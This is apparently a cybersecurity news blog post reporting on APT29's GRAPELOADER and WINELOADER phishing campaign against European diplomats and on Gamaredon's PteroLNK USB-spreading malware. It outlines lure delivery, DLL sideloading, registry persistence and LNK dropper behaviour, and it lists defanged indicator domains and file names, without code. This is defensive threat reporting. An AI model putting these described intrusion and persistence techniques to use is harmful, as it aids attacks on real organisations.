APT29 Pushed GRAPELOADER Malware Threatening European Diplomats Via Wine-Tasting Lures
APT29 Pushed GRAPELOADER Malware Threatening European Diplomats Via Wine-Tasting Lures
“APT29, a state-sponsored adversary, has come to be known as the mastermind behind a phishing campaign posing threats to European territories.”
Cyber scam rates are increasing rapidly due to rising rates of malicious sources for accessing authority of networks, systems, servers, and databases for adversaries. Here, we have the latest cyber scam news for you.
APT29, a Russian state-sponsored threat actor, has been connected to a sophisticated phishing campaign that uses a new version of WINELOADER and a hitherto undiscovered malware loader called GRAPELOADER to target diplomatic institutions around Europe.
Check Point, Technical Analysis, earlier this week
| “While the improved WINELOADER variant is still a modular backdoor used in later stages, GRAPELOADER is a newly observed initial-stage tool used for fingerprinting, persistence, and payload delivery.”
“Despite differing roles, both share similarities in code structure, obfuscation, and string decryption. GRAPELOADER refines WINELOADER’s anti-analysis techniques while introducing more advanced stealth methods.” |
Zscaler ThreatLabz initially reported on the deployment of WINELOADER in February 2024. The attacks used wine-tasting lures to compromise the systems of diplomatic personnel.
Although the effort was initially linked to a threat activity cluster called SPIKEDWINE, Google-owned Mandiant later linked it to the Russian Foreign Intelligence Service (SVR)-affiliated hacker organization APT29 (also known as Cozy Bear or Midnight Blizzard).
In the most recent round of assaults, recipients are sent emails inviting them to wine tasting events under the guise of an unidentified European Ministry of Foreign Affairs. The emails trick the targets into clicking on a link that launches GRAPELOADER by using a ZIP file that contains malware (“wine.zip”).
The domains bakenhof[.]com and silry[.]com were used to send the emails. According to reports, the campaign primarily targeted several European nations, concentrating on foreign ministry offices and other nations’ embassies in Europe. There are hints that Middle Eastern diplomats might have also been singled out.
Three files are included in the ZIP archive: This malicious DLL (“ppcore.dll”) is launched by exploiting a genuine PowerPoint executable (“wine.exe”) that uses the DLL (“AppvIsvSubsystems64.dll”) as a dependency.
The main payload is dropped by the sideloaded malware acting as a loader (also known as GRAPELOADER). By altering the Windows Registry to guarantee that the “wine.exe” executable is started each time the machine is rebooted, the virus becomes persistent.
In addition to using anti-analysis methods like runtime API resolution and string obfuscation, GRAPELOADER is made to gather basic host information and exfiltrate it to an external server to obtain the shellcode for the next stage.
The payload’s precise nature is unknown, but Check Point claimed to have seen updated WINELOADER components posted to the VirusTotal platform that had compilation timestamps that matched “AppvIsvSubsystems64.dll.”
Cybersecurity Company
| “With this information and the fact that GRAPELOADER replaced ROOTSAW, an HTA downloader used in past campaigns to deliver WINELOADER, we believe that GRAPELOADER ultimately leads to the deployment of WINELOADER.” |
The discoveries coincide with HarfangLab’s description of Gamaredon’s PteroLNK VBScript malware, which the Russian threat actor uses to infect all USB drives that are connected with either PowerShell or VBScript versions of the malicious program.
Between December 2024 and February 2025, the PteroLNK samples were submitted to VirusTotal from Ukraine, which was the hacker group’s main target.
ESET noted in September 2024
| “Both tools, when deployed on a system, repeatedly attempt to detect connected USB drives to drop LNK files and in some cases, also a copy of PteroLNK onto them.”
“Clicking on a LNK file can, depending on the particular PteroLNK version that created it, either directly retrieve the next stage from a C2 server, or execute a PteroLNK copy to download additional payloads.” |
According to the French cybersecurity company, PteroLNK VBScript files are highly obfuscated and are in charge of dynamically creating an LNK dropper and a downloader while they are running.
The LNK dropper script is set up to run every nine minutes, while the downloader is scheduled to run every three minutes.
To connect to a distant server and retrieve more malware, the downloader uses a multi-stage, modular architecture. In contrast, the LNK dropper spreads across local and network drives, hiding the original.pdf,.docx, and.xlsx files in the directory root and replacing them with their misleading shortcut counterparts. When these shortcuts are launched, PteroLNK is intended to run in their place.
HarfangLab
| “The scripts are designed to allow flexibility for their operators, enabling easy modification of parameters such as file names and paths, persistence mechanisms (registry keys and scheduled tasks), and detection logic for security solutions on the target system.” |
The LNK dropper and the downloader both refer to the same two payloads that the Broadcom-owned Symantec Threat Hunter team disclosed earlier this month as being a part of an attack chain that disseminated an updated version of the GammaSteel stealer:
● NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms (Downloader)
● NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms (LNK dropper)
Company
| “Gamaredon operates as a critical component of Russia’s cyber operations strategy, particularly in its ongoing war with Ukraine,” the company said. “Gamaredon’s effectiveness lies not in technical sophistication but in tactical adaptability.”
“Their modus operandi combines aggressive spearphishing campaigns, rapid deployment of heavily obfuscated custom malware, and redundant C2 infrastructure. The group prioritizes operational impact over stealth, exemplified by pointing their DDRs to long-standing domains publicly linked to their past operations.” |
About The Author
Suraj Koli is a content specialist with expertise in Cybersecurity and B2B Domains. He has provided his skills for the News4Hackers Blog and Craw Security. Moreover, he has written content for various sectors Business, Law, Food and beverage, Entertainment, and many others. Koli established his center of the field in an amazing scenario. Simply said, he started his career selling products, where he enhanced his skills in understanding the product and the point of view of clients from the customer’s perspective, which simplified his journey in the long run. It makes him an interesting personality among other writers. Currently, he is a regular writer at Craw Security.
READ MORE HERE
4 UPI Outages in 3 Weeks: An Inside Look at India’s Digital Payments System
About Author
English